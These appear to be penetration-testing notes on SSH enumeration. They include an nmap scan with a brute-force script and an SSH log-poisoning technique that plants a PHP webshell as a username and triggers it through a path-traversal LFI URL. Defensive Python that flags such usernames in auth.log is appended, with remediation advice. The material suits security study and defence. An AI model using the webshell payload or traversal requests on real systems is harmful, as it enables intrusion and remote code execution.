SSH Enum
SSH Enumeration
CheckList
Probably not useful unless you have uploaded a key somewhere or found a private key file. Sometimes useful for log file poisoning with LFI.
Login and test SSH connectivity
ssh [email protected]
OR
ssh [email protected]
SSH NMAP Scripts
nmap -sV -Pn -vv -p 22 --script ssh-auth-methods,ssh-brute,ssh-hostkey,ssh-publickey-acceptance,ssh-run,ssh2-enum-algos,sshv1 10.10.10.20
Code Execution through SSH/LFI
ssh '<?php system($_GET['cmd']); ?>'@10.10.10.10
==========================================================================
The failed login records the supplied username in /var/log/auth.log. After this, on the LFI you have discovered, just add the cmd variable:
?cmd=id
&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=whoami
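From the defender's side, the poisoning step above leaves PHP code in the username field of sshd's entries in /var/log/auth.log. The following is an added example, not part of the original notes, that scans auth.log text for such usernames; the sample log lines, the regexes and the function name are constructed for illustration.

```python
import re

# Constructed sample lines in the format OpenSSH writes to /var/log/auth.log.
SAMPLE_LOG = """\
Mar  3 10:14:02 web01 sshd[2211]: Invalid user admin from 10.10.10.5 port 40122
Mar  3 10:14:09 web01 sshd[2215]: Invalid user <?php system($_GET['cmd']); ?> from 10.10.10.5 port 40130
Mar  3 10:14:09 web01 sshd[2215]: Failed password for invalid user <?php system($_GET['cmd']); ?> from 10.10.10.5 port 40130 ssh2
Mar  3 10:15:40 web01 sshd[2230]: Accepted publickey for deploy from 10.10.10.7 port 51514 ssh2
Mar  3 10:16:01 web01 sshd[2240]: Failed password for root from 10.10.10.9 port 33210 ssh2
"""

# sshd messages that echo the client-supplied username into the log.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed \S+ for(?: invalid user)?|Accepted \S+ for) "
    r"(?P<user>.*) from (?P<ip>\S+) port \d+"
)
# Conservative account-name shape (assumption); anything else is worth a look.
SANE_USER_RE = re.compile(r"[a-z_][a-z0-9_.-]{0,31}\$?", re.IGNORECASE)
# Markers that only matter if the log is later parsed as a script.
CODE_MARKERS = ("<?", "?>", "$_", "<script", "`")


def find_poisoned_usernames(log_text):
    """Return (line_no, source_ip, username, reason) for suspicious sshd usernames."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.search(line)
        if not m:
            continue
        user = m.group("user")
        hits = [marker for marker in CODE_MARKERS if marker in user]
        if hits:
            reason = "code markers: " + " ".join(hits)
        elif not SANE_USER_RE.fullmatch(user):
            reason = "unusual characters"
        else:
            continue
        findings.append((line_no, m.group("ip"), user, reason))
    return findings


if __name__ == "__main__":
    for finding in find_poisoned_usernames(SAMPLE_LOG):
        print(finding)
```

Detection is a backstop: the fix is on the web side, where the include path must not be attacker-controlled and the web server account should not be able to read /var/log/auth.log.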